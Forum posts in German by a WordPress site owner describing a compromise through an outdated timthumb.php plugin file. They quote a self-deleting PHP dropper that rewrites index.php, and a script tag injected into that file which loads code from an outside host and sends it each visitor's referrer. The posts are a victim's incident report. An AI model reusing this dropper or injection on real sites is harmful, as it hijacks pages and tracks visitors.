Beiträge von d4chs

    Danke für die Links! Es war tatsächlich doch timthumb.php, wie Du in Deinem ersten Posting schon richtig vermutet hattest.

    Die .php-Datei wurde von dem

    "igit-related-posts-with-thumb-images-after-posts"

    Plugin benutzt.

    Ich habe nun die geupdatete timthumb in den Plugin-Ordner geladen, das Plugin funktioniert aber jetzt nicht mehr.

    Da ich endlich die Sicherheitslücke gefunden habe, werde ich alle Dateien austauschen, die beim Update auf 3.2.1 nicht erneuert wurden.

    Vielen Dank nochmal für deine Hilfe!

    Hallo,

    seid ein paar Stunden läuft auf meiner Seite ein Script, welches ich nicht selbst installiert habe. Zumindest war es gestern noch nicht vorhanden und ich habe nichts neues dazugenommen.

    Das Script heisst

    "138aab288c363726990120413c62acee.php", befindet sich im /wp-content Ordner und sieht folgendermassen aus:

    <?php
    $file = __FILE__;
    $pos = strpos($file,'wp-content');
    $dir = substr($file,0,$pos);
    $index = file_get_contents($dir.'index.php');
    $index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
    $f = fopen($dir.'index.php',"w");
    fputs($f,$index);
    fclose($f);
    echo 'OK';
    unlink($file);
    ?>

    Ich benutze Firefox mit NoScript und habe es erst dadurch gemerkt, da das Script durch NoScript geblockt wurde.


    edit: Ich habe den o.a. File gelöscht und das Script taucht immernoch auf. In der index.php habe ich dieses gefunden:


    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    echo'<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>


    edit²: Ich habe nun eine ältere, cleane index.php Version eines Backups auf den Server geladen und das Problem ist verschwunden.


    edit³: Ich mache gerade ein Backup meiner Serverdaten und Avira AntiVir meldet folgendes:

    Die Datei 'D:\~...\wp-admin\common.php'
    enthielt einen Virus oder unerwünschtes Programm 'PHP/RemoteAdmin.91' [virus].

    Die Datei 'D:\~...\wp-admin\js\config.php'
    enthielt einen Virus oder unerwünschtes Programm 'PHP/RemoteAdmin.91' [virus].


    Reicht es wenn ich die betroffenen Dateien vom Server lösche? Wie kommen diese Files auf meinen Server? Über Hilfe wäre ich dankbar!


    Vielen Dank im voraus,

    Grüße Jörn.